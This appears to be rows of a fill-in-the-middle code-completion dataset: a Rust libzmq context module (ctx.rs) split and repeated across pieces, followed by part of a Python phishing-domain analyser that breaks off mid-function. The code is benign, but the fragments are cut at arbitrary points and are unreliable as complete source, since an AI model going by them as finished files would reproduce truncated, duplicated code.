max_msg_size: Option<i32>,
max_sockets: Option<i32>,
no_linger: Option<bool>,
}
impl CtxConfig {
pub fn new() -> Self {
Self::default()
}
pub fn build(&self) -> Result<Ctx, Error> {
let ctx = Ctx::new();
self.apply(&ctx)?;
Ok(ctx)
}
pub fn apply(&self, ctx: &Ctx) -> Result<(), Error> {
if let Some(value) = self.io_threads {
ctx.set_io_threads(value)?;
}
if let Some(value) = self.max_sockets {
ctx.set_max_sockets(value)?;
}
if let Some(value) = self.max_msg_size {
ctx.set_max_msg_size(value)?;
}
if let Some(value) = self.no_linger {
ctx.set_no_linger(value)?;
}
Ok(())
}
pub fn io_threads(&self) -> Option<i32> {
self.io_threads
}
pub fn set_io_threads(&mut self, value: Option<i32>) {
self.io_threads = value;
}
pub fn max_msg_size(&self) -> Option<i32> {
self.max_msg_size
}
pub fn set_max_msg_size(&mut self, value: Option<i32>) {
self.max_msg_size = value;
}
pub fn max_sockets(&self) -> Option<i32> {
self.max_sockets
}
pub fn set_max_sockets(&mut self, value: Option<i32>) {
self.max_sockets = value;
}
pub fn no_linger(&self) -> Option<bool> {
self.no_linger
}
pub fn set_no_linger(&mut self, value: Option<bool>) {
self.no_linger = value;
}
}
/// A convenience builder for a [`Ctx`].
///
/// Makes complex context configuration more convenient.
///
/// [`Ctx`]: struct.Ctx.html
#[derive(Default, Clone, PartialEq, Eq, Hash, Serialize, Deserialize)]
pub struct CtxBuilder {
inner: CtxConfig,
}
impl CtxBuilder {
pub fn new() -> Self {
Self::default()
}
/// Builds a `Ctx` from a `CtxBuilder`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::*;
///
/// let ctx = CtxBuilder::new()
/// .io_threads(2)
/// .no_linger()
/// .build()?;
///
/// assert_eq!(ctx.io_threads(), 2);
/// assert_eq!(ctx.no_linger(), true);
/// #
/// # Ok(())
/// # }
/// ```
pub fn build(&self) -> Result<Ctx, Error> {
let ctx = Ctx::new();
self.apply(&ctx)?;
Ok(ctx)
}
/// Applies a `CtxBuilder` to an existing `Ctx`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::*;
///
/// let global = Ctx::global();
///
/// CtxBuilder::new()
/// .io_threads(0)
/// .max_msg_size(420)
/// .max_sockets(69)
/// .no_linger()
/// .apply(global)?;
///
/// assert_eq!(global.io_threads(), 0);
/// assert_eq!(global.max_msg_size(), 420);
/// assert_eq!(global.no_linger(), true);
/// assert_eq!(global.max_sockets(), 69);
/// #
/// # Ok(())
/// # }
/// ```
pub fn apply(&self, ctx: &Ctx) -> Result<(), Error> {
self.inner.apply(ctx)
}
/// See [`set_io_threads`].
///
/// [`set_io_threads`]: struct.Ctx.html#method.set_io_threads
pub fn io_threads(&mut self, value: i32) -> &mut Self {
self.inner.set_io_threads(Some(value));
self
}
/// See [`set_max_msg_size`].
///
/// [`set_max_msg_size`]: struct.Ctx.html#method.set_max_msg_size
pub fn max_msg_size(&mut self, value: i32) -> &mut Self {
self.inner.set_max_msg_size(Some(value));
self
}
/// See [`set_max_sockets`].
///
/// [`set_max_sockets`]: struct.Ctx.html#method.set_max_sockets
pub fn max_sockets(&mut self, value: i32) -> &mut Self {
self.inner.set_max_sockets(Some(value));
self
}
/// See [`set_no_linger`].
///
/// [`set_no_linger`]: struct.Ctx.html#method.set_no_linger
pub fn no_linger(&mut self) -> &mut Self {
self.inner.set_no_linger(Some(true));
self
}
}
/// Keeps the list of sockets and manages the async I/O thread and
/// internal queries.
///
/// Each context also has an associated `AuthServer` which handles socket
/// authentication.
///
/// # Drop
/// The context will call terminate when dropped which will cause all
/// blocking calls to fail with `CtxTerminated`, then block until
/// the following conditions are met:
/// * All sockets open within context have been dropped.
/// * All messages sent by the application will have either been physically
/// transferred to a network peer, or the socket's linger period has expired.
///
/// # Thread safety
/// A ØMQ context is internally thread safe.
///
/// # Multiple Contexts
/// Multiple contexts are allowed but are considered exotic.
#[derive(Clone, Eq, PartialEq, Debug)]
pub struct Ctx {
raw: Arc<RawCtx>,
}
impl Ctx {
/// Create a new ØMQ context.
///
/// For almost all use cases, using and configuring the [`global`] context
/// will be enough.
///
/// See [`zmq_ctx_new`].
///
/// [`zmq_ctx_new`]: http://api.zeromq.org/master:zmq-ctx-new
///
/// # Usage Example
/// ```
/// use libzmq::Ctx;
///
/// let ctx = Ctx::new();
/// let cloned = ctx.clone();
///
/// assert_eq!(ctx, cloned);
/// assert_ne!(ctx, Ctx::new());
/// ```
///
/// [`global`]: #method.global
pub fn new() -> Self {
let raw = Arc::new(RawCtx::default());
// Enable ipv6 by default.
raw.set_bool(RawCtxOption::IPV6, true).unwrap();
let ctx = Self { raw };
// Start a `ZAP` handler for the context.
let mut auth = AuthServer::with_ctx(&ctx).unwrap();
// This thread is guaranteed to terminate before the ctx
// since it holds an `Arc` to it. No need to store & join the
// thread handle.
thread::spawn(move || auth.run());
ctx
}
/// Returns a reference to the global context.
///
/// This is a singleton used by sockets created via their respective
/// `::new()` method. It merely exists for convenience and is no different
/// from a context obtained via `Ctx::new()`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::{Ctx, Client};
///
/// // A socket created via `new` will use the global `Ctx`.
/// let client = Client::new()?;
/// assert_eq!(client.ctx(), Ctx::global());
/// #
/// # Ok(())
/// # }
/// ```
pub fn global() -> &'static Ctx {
&GLOBAL_CONTEXT
}
/// Returns the size of the ØMQ thread pool for this context.
pub fn io_threads(&self) -> i32 {
self.raw.as_ref().get(RawCtxOption::IOThreads)
}
/// Set the size of the ØMQ thread pool to handle I/O operations.
///
/// "The general rule of thumb is to allow one I/O thread per gigabyte of
/// data in or out per second." - [`Pieter Hintjens`]
///
/// [`Pieter Hintjens`]: http://zguide.zeromq.org/page:all#I-O-Threads
///
/// # Default
/// The default value is `1`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::Ctx;
///
/// let ctx = Ctx::new();
/// assert_eq!(ctx.io_threads(), 1);
///
/// // Let's say our app exclusively uses the inproc transport
/// // for messaging. Then we don't need any I/O threads.
/// ctx.set_io_threads(0)?;
/// assert_eq!(ctx.io_threads(), 0);
/// #
/// # Ok(())
/// # }
/// ```
pub fn set_io_threads(&self, nb_threads: i32) -> Result<(), Error> {
self.raw.as_ref().set(RawCtxOption::IOThreads, nb_threads)
}
/// Returns the maximum number of sockets allowed for this context.
pub fn max_sockets(&self) -> i32 {
self.raw.as_ref().get(RawCtxOption::MaxSockets)
}
/// Sets the maximum number of sockets allowed on the context.
///
/// # Default
/// The default value is `1023`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::Ctx;
///
/// let ctx = Ctx::new();
/// assert_eq!(ctx.max_sockets(), 1023);
///
/// ctx.set_max_sockets(420)?;
/// assert_eq!(ctx.max_sockets(), 420);
/// #
/// # Ok(())
/// # }
/// ```
pub fn set_max_sockets(&self, max: i32) -> Result<(), Error> {
self.raw.as_ref().set(RawCtxOption::MaxSockets, max)
}
/// Returns the maximum size of a message allowed for this context.
pub fn max_msg_size(&self) -> i32 {
self.raw.as_ref().get(RawCtxOption::MaxMsgSize)
}
/// Sets the maximum allowed size of a message sent in the context.
///
/// # Default
/// The default value is `i32::max_value()`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::Ctx;
///
/// let ctx = Ctx::new();
/// assert_eq!(ctx.max_msg_size(), i32::max_value());
///
/// ctx.set_max_msg_size(i32::max_value() - 1)?;
/// assert_eq!(ctx.max_msg_size(), i32::max_value() - 1);
/// #
/// # Ok(())
/// # }
/// ```
pub fn set_max_msg_size(&self, size: i32) -> Result<(), Error> {
self.raw.as_ref().set(RawCtxOption::MaxMsgSize, size)
}
/// Returns the largest number of sockets that the context will accept.
pub fn socket_limit(&self) -> i32 {
self.raw.as_ref().get(RawCtxOption::SocketLimit)
}
/// A value of `true` indicates that all new sockets are given a
/// linger timeout of zero.
///
pub fn no_linger(&self) -> bool {
!self.raw.as_ref().get_bool(RawCtxOption::Blocky)
}
/// When set to `true`, all new sockets are given a linger timeout
/// of zero.
///
/// # Default
/// The default value is `false`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::Ctx;
///
/// let ctx = Ctx::new();
/// assert_eq!(ctx.no_linger(), false);
///
/// ctx.set_no_linger(true)?;
/// assert_eq!(ctx.no_linger(), true);
/// #
/// # Ok(())
/// # }
/// ```
pub fn set_no_linger(&self, enabled: bool) -> Result<(), Error> {
self.raw.as_ref().set_bool(RawCtxOption::Blocky, !enabled)
}
/// Shut down the ØMQ context.
///
/// Context shutdown will cause any blocking operations currently in
/// progress on sockets open within context to fail immediately with
/// [`CtxTerminated`].
///
/// Any further operations on sockets open within context shall fail
/// with [`CtxTerminated`].
///
/// [`CtxTerminated`]: ../error/enum.ErrorKind.html#variant.CtxTerminated
pub fn shutdown(&self) {
self.raw.shutdown()
}
pub(crate) fn as_ptr(&self) -> *mut c_void {
self.raw.ctx
}
}
impl Default for Ctx {
fn default() -> Self {
Self::new()
}
}
impl<'a> From<&'a Ctx> for Ctx {
fn from(c: &'a Ctx) -> Ctx {
c.to_owned()
}
} | }
#[derive(Copy, Clone, Debug)]
enum RawCtxOption { | random_line_split |
ctx.rs | //! The ØMQ context type.
use crate::{auth::server::AuthServer, error::*};
use libzmq_sys as sys;
use sys::errno;
use lazy_static::lazy_static;
use serde::{Deserialize, Serialize};
use std::{
os::raw::{c_int, c_void},
ptr, str,
sync::Arc,
thread,
};
lazy_static! {
static ref GLOBAL_CONTEXT: Ctx = Ctx::new();
}
#[derive(Copy, Clone, Debug)]
enum RawCtxOption {
IOThreads,
MaxSockets,
MaxMsgSize,
SocketLimit,
IPV6,
Blocky,
}
impl From<RawCtxOption> for c_int {
fn from(r: RawCtxOption) -> c_int {
match r {
RawCtxOption::IOThreads => sys::ZMQ_IO_THREADS as c_int,
RawCtxOption::MaxSockets => sys::ZMQ_MAX_SOCKETS as c_int,
RawCtxOption::MaxMsgSize => sys::ZMQ_MAX_MSGSZ as c_int,
RawCtxOption::SocketLimit => sys::ZMQ_SOCKET_LIMIT as c_int,
RawCtxOption::IPV6 => sys::ZMQ_IPV6 as c_int,
RawCtxOption::Blocky => sys::ZMQ_BLOCKY as c_int,
}
}
}
#[derive(Debug)]
struct RawCtx {
ctx: *mut c_void,
}
impl RawCtx {
fn get(&self, option: RawCtxOption) -> i32 {
unsafe { sys::zmq_ctx_get(self.ctx, option.into()) }
}
fn set(&self, option: RawCtxOption, value: i32) -> Result<(), Error> {
let rc = unsafe { sys::zmq_ctx_set(self.ctx, option.into(), value) };
if rc == -1 {
let errno = unsafe { sys::zmq_errno() };
match errno {
errno::EINVAL => Err(Error::new(ErrorKind::InvalidInput {
msg: "invalid value",
})),
_ => panic!(msg_from_errno(errno)),
}
} else {
Ok(())
}
}
fn set_bool(&self, opt: RawCtxOption, flag: bool) -> Result<(), Error> {
self.set(opt, flag as i32)
}
fn get_bool(&self, opt: RawCtxOption) -> bool {
let flag = self.get(opt);
flag != 0
}
fn terminate(&self) {
// We loop in case `zmq_ctx_term` gets interrupted by a signal.
loop {
let rc = unsafe { sys::zmq_ctx_term(self.ctx) };
if rc == 0 {
break;
} else {
let errno = unsafe { sys::zmq_errno() };
match errno {
errno::EINTR => (),
_ => unreachable!(),
}
}
}
}
fn shutdown(&self) {
let rc = unsafe { sys::zmq_ctx_shutdown(self.ctx) };
// Should never fail.
assert_eq!(rc, 0);
}
}
// The `zmq_ctx` is internally threadsafe.
unsafe impl Send for RawCtx {}
unsafe impl Sync for RawCtx {}
impl Drop for RawCtx {
fn drop(&mut self) {
self.terminate()
}
}
impl PartialEq for RawCtx {
/// Compares the two underlying raw C pointers.
fn eq(&self, other: &Self) -> bool {
ptr::eq(self.ctx, other.ctx)
}
}
impl Eq for RawCtx {}
impl Default for RawCtx {
fn default() -> Self {
let ctx = unsafe { sys::zmq_ctx_new() };
if ctx.is_null() {
panic!(msg_from_errno(unsafe { sys::zmq_errno() }));
}
Self { ctx }
}
}
/// A config for a [`Ctx`].
///
/// Useful in configuration files.
///
/// [`Ctx`]: struct.Ctx.html
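///
/// # Example
///
/// A sketch of loading a config from JSON and building a [`Ctx`] from it
/// (assumes a serde backend such as `serde_json` on the caller's side; marked
/// `ignore` so it is not run as a doc test):
///
/// ```ignore
/// use libzmq::*;
///
/// let json = r#"{ "io_threads": 2, "max_msg_size": null, "max_sockets": null, "no_linger": true }"#;
/// let config: CtxConfig = serde_json::from_str(json)?;
/// let ctx = config.build()?;
/// assert_eq!(ctx.io_threads(), 2);
/// assert_eq!(ctx.no_linger(), true);
/// ```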
#[derive(Default, Clone, PartialEq, Eq, Hash, Serialize, Deserialize)]
pub struct CtxConfig {
io_threads: Option<i32>,
max_msg_size: Option<i32>,
max_sockets: Option<i32>,
no_linger: Option<bool>,
}
impl CtxConfig {
pub fn new() -> Self {
Self::default()
}
pub fn build(&self) -> Result<Ctx, Error> {
let ctx = Ctx::new();
self.apply(&ctx)?;
Ok(ctx)
}
pub fn apply(&self, ctx: &Ctx) -> Result<(), Error> {
if let Some(value) = self.io_threads {
ctx.set_io_threads(value)?;
}
if let Some(value) = self.max_sockets {
ctx.set_max_sockets(value)?;
}
if let Some(value) = self.max_msg_size {
ctx.set_max_msg_size(value)?;
}
if let Some(value) = self.no_linger {
ctx.set_no_linger(value)?;
}
Ok(())
}
pub fn io_threads(&self) -> Option<i32> {
self.io_threads
}
pub fn set_io_threads(&mut self, value: Option<i32>) {
self.io_threads = value;
}
pub fn max_msg_size(&self) -> Option<i32> {
self.max_msg_size
}
pub fn set_max_msg_size(&mut self, value: Option<i32>) {
self.max_msg_size = value;
}
pub fn max_sockets(&self) -> Option<i32> {
self.max_sockets
}
pub fn set_max_sockets(&mut self, value: Option<i32>) {
self.max_sockets = value;
}
pub fn no_linger(&self) -> Option<bool> {
self.no_linger
}
pub fn set_no_linger(&mut self, value: Option<bool>) {
self.no_linger = value;
}
}
/// A convenience builder for a [`Ctx`].
///
/// Makes complex context configuration more convenient.
///
/// [`Ctx`]: struct.Ctx.html
#[derive(Default, Clone, PartialEq, Eq, Hash, Serialize, Deserialize)]
pub struct CtxBuilder {
inner: CtxConfig,
}
impl CtxBuilder {
pub fn new() -> Self {
Self::default()
}
/// Builds a `Ctx` from a `CtxBuilder`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::*;
///
/// let ctx = CtxBuilder::new()
/// .io_threads(2)
/// .no_linger()
/// .build()?;
///
/// assert_eq!(ctx.io_threads(), 2);
/// assert_eq!(ctx.no_linger(), true);
/// #
/// # Ok(())
/// # }
/// ```
pub fn build(&self) -> Result<Ctx, Error> {
let ctx = Ctx::new();
self.apply(&ctx)?;
Ok(ctx)
}
/// Applies a `CtxBuilder` to an existing `Ctx`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::*;
///
/// let global = Ctx::global();
///
/// CtxBuilder::new()
/// .io_threads(0)
/// .max_msg_size(420)
/// .max_sockets(69)
/// .no_linger()
/// .apply(global)?;
///
/// assert_eq!(global.io_threads(), 0);
/// assert_eq!(global.max_msg_size(), 420);
/// assert_eq!(global.no_linger(), true);
/// assert_eq!(global.max_sockets(), 69);
/// #
/// # Ok(())
/// # }
/// ```
pub fn apply(&self, ctx: &Ctx) -> Result<(), Error> {
self.inner.apply(ctx)
}
/// See [`set_io_threads`].
///
/// [`set_io_threads`]: struct.Ctx.html#method.set_io_threads
pub fn i | &mut self, value: i32) -> &mut Self {
self.inner.set_io_threads(Some(value));
self
}
/// See [`set_max_msg_size`].
///
/// [`set_max_msg_size`]: struct.Ctx.html#method.set_max_msg_size
pub fn max_msg_size(&mut self, value: i32) -> &mut Self {
self.inner.set_max_msg_size(Some(value));
self
}
/// See [`set_max_sockets`].
///
/// [`set_max_sockets`]: struct.Ctx.html#method.set_max_sockets
pub fn max_sockets(&mut self, value: i32) -> &mut Self {
self.inner.set_max_sockets(Some(value));
self
}
/// See [`set_no_linger`].
///
/// [`set_no_linger`]: struct.Ctx.html#method.set_no_linger
pub fn no_linger(&mut self) -> &mut Self {
self.inner.set_no_linger(Some(true));
self
}
}
/// Keeps the list of sockets and manages the async I/O thread and
/// internal queries.
///
/// Each context also has an associated `AuthServer` which handles socket
/// authentication.
///
/// # Drop
/// The context will call terminate when dropped which will cause all
/// blocking calls to fail with `CtxTerminated`, then block until
/// the following conditions are met:
/// * All sockets open within context have been dropped.
/// * All messages sent by the application will have either been physically
/// transferred to a network peer, or the socket's linger period has expired.
///
/// # Thread safety
/// A ØMQ context is internally thread safe.
///
/// # Multiple Contexts
/// Multiple contexts are allowed but are considered exotic.
#[derive(Clone, Eq, PartialEq, Debug)]
pub struct Ctx {
raw: Arc<RawCtx>,
}
impl Ctx {
/// Create a new ØMQ context.
///
/// For almost all use cases, using and configuring the [`global`] context
/// will be enough.
///
/// See [`zmq_ctx_new`].
///
/// [`zmq_ctx_new`]: http://api.zeromq.org/master:zmq-ctx-new
///
/// # Usage Example
/// ```
/// use libzmq::Ctx;
///
/// let ctx = Ctx::new();
/// let cloned = ctx.clone();
///
/// assert_eq!(ctx, cloned);
/// assert_ne!(ctx, Ctx::new());
/// ```
///
/// [`global`]: #method.global
pub fn new() -> Self {
let raw = Arc::new(RawCtx::default());
// Enable ipv6 by default.
raw.set_bool(RawCtxOption::IPV6, true).unwrap();
let ctx = Self { raw };
// Start a `ZAP` handler for the context.
let mut auth = AuthServer::with_ctx(&ctx).unwrap();
// This thread is guaranteed to terminate before the ctx
// since it holds an `Arc` to it. No need to store & join the
// thread handle.
thread::spawn(move || auth.run());
ctx
}
/// Returns a reference to the global context.
///
/// This is a singleton used by sockets created via their respective
/// `::new()` method. It merely exists for convenience and is no different
/// from a context obtained via `Ctx::new()`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::{Ctx, Client};
///
/// // A socket created via `new` will use the global `Ctx`.
/// let client = Client::new()?;
/// assert_eq!(client.ctx(), Ctx::global());
/// #
/// # Ok(())
/// # }
/// ```
pub fn global() -> &'static Ctx {
&GLOBAL_CONTEXT
}
/// Returns the size of the ØMQ thread pool for this context.
pub fn io_threads(&self) -> i32 {
self.raw.as_ref().get(RawCtxOption::IOThreads)
}
/// Set the size of the ØMQ thread pool to handle I/O operations.
///
/// "The general rule of thumb is to allow one I/O thread per gigabyte of
/// data in or out per second." - [`Pieter Hintjens`]
///
/// [`Pieter Hintjens`]: http://zguide.zeromq.org/page:all#I-O-Threads
///
/// # Default
/// The default value is `1`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::Ctx;
///
/// let ctx = Ctx::new();
/// assert_eq!(ctx.io_threads(), 1);
///
/// // Let's say our app exclusively uses the inproc transport
/// // for messaging. Then we don't need any I/O threads.
/// ctx.set_io_threads(0)?;
/// assert_eq!(ctx.io_threads(), 0);
/// #
/// # Ok(())
/// # }
/// ```
pub fn set_io_threads(&self, nb_threads: i32) -> Result<(), Error> {
self.raw.as_ref().set(RawCtxOption::IOThreads, nb_threads)
}
/// Returns the maximum number of sockets allowed for this context.
pub fn max_sockets(&self) -> i32 {
self.raw.as_ref().get(RawCtxOption::MaxSockets)
}
/// Sets the maximum number of sockets allowed on the context.
///
/// # Default
/// The default value is `1023`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::Ctx;
///
/// let ctx = Ctx::new();
/// assert_eq!(ctx.max_sockets(), 1023);
///
/// ctx.set_max_sockets(420)?;
/// assert_eq!(ctx.max_sockets(), 420);
/// #
/// # Ok(())
/// # }
/// ```
pub fn set_max_sockets(&self, max: i32) -> Result<(), Error> {
self.raw.as_ref().set(RawCtxOption::MaxSockets, max)
}
/// Returns the maximum size of a message allowed for this context.
pub fn max_msg_size(&self) -> i32 {
self.raw.as_ref().get(RawCtxOption::MaxMsgSize)
}
/// Sets the maximum allowed size of a message sent in the context.
///
/// # Default
/// The default value is `i32::max_value()`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::Ctx;
///
/// let ctx = Ctx::new();
/// assert_eq!(ctx.max_msg_size(), i32::max_value());
///
/// ctx.set_max_msg_size(i32::max_value() - 1)?;
/// assert_eq!(ctx.max_msg_size(), i32::max_value() - 1);
/// #
/// # Ok(())
/// # }
/// ```
pub fn set_max_msg_size(&self, size: i32) -> Result<(), Error> {
self.raw.as_ref().set(RawCtxOption::MaxMsgSize, size)
}
/// Returns the largest number of sockets that the context will accept.
pub fn socket_limit(&self) -> i32 {
self.raw.as_ref().get(RawCtxOption::SocketLimit)
}
/// A value of `true` indicates that all new sockets are given a
/// linger timeout of zero.
///
pub fn no_linger(&self) -> bool {
!self.raw.as_ref().get_bool(RawCtxOption::Blocky)
}
/// When set to `true`, all new sockets are given a linger timeout
/// of zero.
///
/// # Default
/// The default value is `false`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::Ctx;
///
/// let ctx = Ctx::new();
/// assert_eq!(ctx.no_linger(), false);
///
/// ctx.set_no_linger(true)?;
/// assert_eq!(ctx.no_linger(), true);
/// #
/// # Ok(())
/// # }
/// ```
pub fn set_no_linger(&self, enabled: bool) -> Result<(), Error> {
self.raw.as_ref().set_bool(RawCtxOption::Blocky, !enabled)
}
/// Shut down the ØMQ context.
///
/// Context shutdown will cause any blocking operations currently in
/// progress on sockets open within context to fail immediately with
/// [`CtxTerminated`].
///
/// Any further operations on sockets open within context shall fail
/// with [`CtxTerminated`].
///
/// [`CtxTerminated`]: ../error/enum.ErrorKind.html#variant.CtxTerminated
pub fn shutdown(&self) {
self.raw.shutdown()
}
pub(crate) fn as_ptr(&self) -> *mut c_void {
self.raw.ctx
}
}
impl Default for Ctx {
fn default() -> Self {
Self::new()
}
}
impl<'a> From<&'a Ctx> for Ctx {
fn from(c: &'a Ctx) -> Ctx {
c.to_owned()
}
}
| o_threads( | identifier_name |
common_domain_analyser.py | '''
Verify the domain against the list of most popular domains from OpenDNS
(https://github.com/opendns/public-domain-lists). Let's see how useful
it is to prevent phishing domains.
'''
from enum import Enum
import re
import tldextract
import wordsegment
from nostril import nonsense
import idna
from confusable_homoglyphs import confusables
import ahocorasick
from .base import Analyser
# Take a histogram here and find out the suitable value for this
BULK_DOMAIN_THRESHOLD = 15
# pylint: disable=too-few-public-methods
class AhoCorasickDomainMatching(Analyser):
'''
The domain and its SAN will be compared against the list of domains, for
example, the most popular domains from OpenDNS.
'''
# Get this number from the histogram of the length of all top domains
MIN_MATCHING_LENGTH = 3
# Some domains that don't work too well with tldextract and generate too
# many FPs
EXCLUDED_DOMAINS = {
'www': 1,
'web': 1,
}
# Some common domain parts that cause too many FP
IGNORED_PARTS = r'^(autodiscover\.|cpanel\.)'
def __init__(self, domains):
'''
Use Aho-Corasick to find the matching domain so we construct its Trie
here. Thought: How the f**k is com.com in the list?
'''
self.automaton = ahocorasick.Automaton()
self.domains = {}
for index, domain in enumerate(domains):
# Processing only the domain part. All sub-domains or TLDs will
# be ignored, for example:
# - www.google.com becomes google
# - www.google.co.uk becomes google
# - del.icio.us becomes icio
ext = tldextract.extract(domain)
if ext.domain in AhoCorasickDomainMatching.EXCLUDED_DOMAINS:
continue
self.automaton.add_word(ext.domain, (index, ext.domain))
self.domains[ext.domain] = domain
self.automaton.make_automaton()
def run(self, record):
'''
Use Aho-Corasick to find the matching domain. Check the time complexity
of this function later.
Tricky situation #1: When the string (domain) in the Trie is too short,
it could match many domains, for example, g.co or t.co. So they need
to be ignored somehow. Looking at the histogram of the length of all
domains in the list, there are only less than 100 domains with the
length of 2 or less. So we choose to ignore those. Also, we will
prefer longer match than a shorter one for now.
'''
if 'analysers' not in record:
record['analysers'] = []
results = {}
# Check the domain and all its SAN
for domain in record['all_domains']:
# Remove wildcard
domain = re.sub(r'^\*\.', '', domain)
# Remove some FP-prone parts
domain = re.sub(AhoCorasickDomainMatching.IGNORED_PARTS, '', domain)
# Similar to all domains in the list, the TLD will be stripped off
ext = tldextract.extract(domain)
# The match will be a tuple in the following format: (5, (0, 'google'))
matches = [m[1][1] for m in self.automaton.iter('.'.join(ext[:2]))
if len(m[1][1]) >= AhoCorasickDomainMatching.MIN_MATCHING_LENGTH]
if matches:
matches.sort(key=len)
match = matches[-1]
# We only keep the longest match of the first matching domain
# for now
results[domain] = [self.domains[match]] if match in self.domains else match
break
if results:
record['analysers'].append({
'analyser': type(self).__name__,
'output': results,
})
return record
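# Usage sketch (illustrative only, not part of the original module): feeding a
# record through the matcher. The record layout mirrors what run() expects; the
# domain list and SAN below are made-up examples.
def _example_ahocorasick_usage():
    analyser = AhoCorasickDomainMatching(['www.google.com', 'www.apple.com'])
    record = {'all_domains': ['login-appleid.apple.com.managesupport.co']}
    # After run(), record['analysers'] holds an entry mapping the SAN to the
    # matched popular domain (here 'www.apple.com').
    return analyser.run(record)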
class WordSegmentation(Analyser):
'''
Perform word segmentation of all the SAN domains as an attempt to make sense
of their names. For example, both arch.mappleonline.com and apple-verifyupdate.serveftp.com
domains have 'apple' inside but only the second one is an actual Apple phishing
page. Intuitively, a good word segmentation algorithm will return:
- arch + mapple + online + com
- apple + verify + update + serve + ftp + com
Thus, it's much easier to spot the second phishing domain.
Implementation-wise, there are several existing packages around to do this, for
example:
- https://github.com/grantjenks/python-wordsegment
- https://github.com/keredson/wordninja
Let's see what they can do, take it away!
'''
# Some common stop words that are in the list of most popular domains
STOPWORDS = {
'app': 1,
'inc': 1,
'box': 1,
'health': 1,
'home': 1,
'space': 1,
'cars': 1,
'nature': 1,
}
def __init__(self):
'''
Just load the wordsegment package, whatever it is.
'''
wordsegment.load()
def run(self, record):
'''
Apply word segment to all the SAN domain names. Let's see if it makes
any sense.
'''
if 'analysers' not in record:
record['analysers'] = []
results = {}
# Check the domain and all its SAN
for domain in record['all_domains']:
# Remove wildcard
domain = re.sub(r'^\*\.', '', domain)
# The TLD will be stripped off cause it does not contribute anything here
ext = tldextract.extract(domain)
words = []
# We choose to segment the TLD here as well, for example, .co.uk
# will become ['co', 'uk']. Let see if this works out.
for part in ext[:]:
for token in part.split('.'):
segmented = [w for w in wordsegment.segment(token) if w not in WordSegmentation.STOPWORDS]
if segmented:
words.extend(segmented)
elif token:
# For some IDNA domain like xn--wgbfq3d.xn--ngbc5azd, the segmentation
# won't work and an empty array is returned. So we choose to just keep
# the original token
words.append(token)
results[domain] = words
if results:
|
return record
class DomainMatchingOption(Enum):
'''
Control how strict we want to do our matching.
'''
# For example, applefake.it will match with apple.com because ['apple'] is
# a subset of ['apple', 'fake']
SUBSET_MATCH = 0
# Similar but use in instead of issubset so that the order is preserved
ORDER_MATCH = 1
class DomainMatching(Analyser):
'''
This is the first example of the new group of meta analysers which are used
to combine the result of other analysers.
'''
def __init__(self, include_tld=True, option=DomainMatchingOption.ORDER_MATCH):
'''
Just load the wordsegment package, whatever it is.
'''
wordsegment.load()
# Save the matching option here so we can refer to it later
self.include_tld = include_tld
self.option = {
DomainMatchingOption.SUBSET_MATCH: set,
DomainMatchingOption.ORDER_MATCH: list,
}[option]
def run(self, record):
'''
Note that a meta-analyser will need to run after other analysers have
finished so that their outputs are available.
'''
if 'analysers' not in record:
return record
analysers = {
AhoCorasickDomainMatching.__name__: {},
WordSegmentation.__name__: {},
BulkDomainMarker.__name__: {},
}
for analyser in record['analysers']:
name = analyser['analyser']
if name not in analysers:
continue
if name == BulkDomainMarker.__name__ and analyser['output']:
# Skip bulk records and deal with them later; with such a large
# number of SAN names, it's bound to be a match
continue
analysers[name] = analyser['output']
# Check that all outputs are there before continuing
if not analysers[AhoCorasickDomainMatching.__name__] or not analysers[WordSegmentation.__name__]:
return record
results = self._match(analysers[AhoCorasickDomainMatching.__name__],
analysers[WordSegmentation.__name__])
if results:
record['analysers'].append({
'analyser': type(self).__name__,
'output': results,
})
return record
def _match(self, ahocorasick_output, segmentation_output):
'''
Used internally by the run function to combine AhoCorasick and WordSegmentation
results.
'''
results = {}
# Check all the matching domains reported by AhoCorasick analyser
for match, domains in ahocorasick_output.items():
# The result of AhoCorasick matcher is a list of matching domains, for example,
#
# {
# 'analyser': 'AhoCorasickDomainMatching',
# 'output': {
# 'login-appleid.apple.com.managesuppport.co': ['apple.com', 'support.com'],
# },
# },
#
if match not in segmentation_output:
continue
phish = self.option(segmentation_output[match])
match_ext = tldextract.extract(match)
for domain in domains:
ext = tldextract.extract(domain)
# This record is from a legitimate source, for example, agrosupport.zendesk.com
# will match with zendesk.com. In our case, we don't really care about this so
# it will be ignored and not reported as a match.
if ext[1:] == match_ext[1:]:
continue
tmp = []
# Intuitively, it will be more accurate if we choose to include the TLD here.
# For example, if both 'apple' and 'com' appear in the matching domain, it's
# very likely that something phishing is going on here. On the other hand,
# if only 'apple' occurs, we are not so sure and it's better left for more
# advanced analysers to have their say on that
for part in ext[:] if self.include_tld else ext[:2]:
for token in part.split('.'):
tmp.extend(wordsegment.segment(token))
legit = self.option(tmp)
if (isinstance(phish, set) and legit.issubset(phish)) or \
(isinstance(phish, list) and '.{}'.format('.'.join(legit)) in '.'.join(phish)):
# Found a possible phishing domain
if match not in results:
results[match] = []
